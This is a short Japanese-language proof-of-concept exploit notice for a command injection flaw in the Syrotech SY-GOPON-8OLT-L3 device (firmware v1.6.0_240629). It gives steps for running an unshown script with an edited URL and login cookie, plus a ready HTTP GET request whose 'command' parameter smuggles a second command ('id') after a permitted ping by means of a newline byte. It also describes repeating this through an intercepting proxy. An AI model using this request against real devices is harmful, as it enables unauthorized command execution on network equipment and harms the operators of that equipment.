
Syrotech SY-GOPON-8OLT-L3におけるコマンドインジェクション脆弱性の概念実証エクスプロイト。HTTPリクエスト操作を介して任意のコマンド実行を可能にします。
Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 コマンドインジェクションの脆弱性
1- スクリプト内のURLを編集します。
2- スクリプト内のCookie_Loginの値を編集します。
3- スクリプトを実行すると、コマンドを実行できるようになります。
GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1
通常、管理パネルではpingコマンドのみが実行を許可されています。
プロキシでリクエストを傍受し、commandパラメータの末尾に改行バイトを追加して実行したいコマンドを入力すると、別のコマンドを実行できます。
Mehmet Demir